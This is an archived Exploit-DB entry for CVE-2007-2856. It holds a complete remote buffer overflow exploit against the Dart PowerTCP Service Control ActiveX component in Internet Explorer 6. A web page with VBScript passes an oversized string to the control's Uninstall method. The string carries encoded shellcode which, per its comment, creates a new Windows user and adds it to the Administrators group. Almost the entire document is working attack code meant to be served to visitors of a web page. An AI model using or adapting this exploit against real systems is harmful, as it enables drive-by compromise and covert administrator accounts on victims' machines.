Exploit Dart Communications PowerTCP - Service Control Remote Buffer Overflow

[Exploiter]

EDB-ID

3982

Проверка EDB

1. Пройдено

Автор

RGOD

Тип уязвимости

REMOTE

Платформа

WINDOWS

CVE

cve-2007-2856

Дата публикации

2007-05-24

<!--
IE 6 / Dart Communications PowerTCP Service Control (DartService.dll 3.1.3.3)
remote buffer overflow exploit / xp sp2 ita ver
by rgod
site: retrogod.altervista.org

software site: www.dart.com

Install, Uninstall methods are vulnerable
shellcode is executed after the browser window is closed, no crash
more chars cause an heap overflow
Sometimes you will see an about box popping, code is executed aswell
Adjusting to another windows language version is very tricky,
use the same logic
-->
<html>
<object classid='clsid:13F4DEDE-D19F-11D2-BA94-0040053687FE' id='Service' ></object>
<script language='vbscript'>

'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add

shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44")

nop   = unescape("%90%90%90%90")
eip   = unescape("%1e%a6%3e%7e") 'call edi user32.dll
patch = unescape("%01%04%04%90")
jmp   = unescape("%e9%27%fe%ff%ff") 'jmp near shellcode

argh = "aaaa" + nop + shellcode + eip + patch + jmp

Service.Uninstall argh

</script>
</html>

# milw0rm.com [2007-05-24]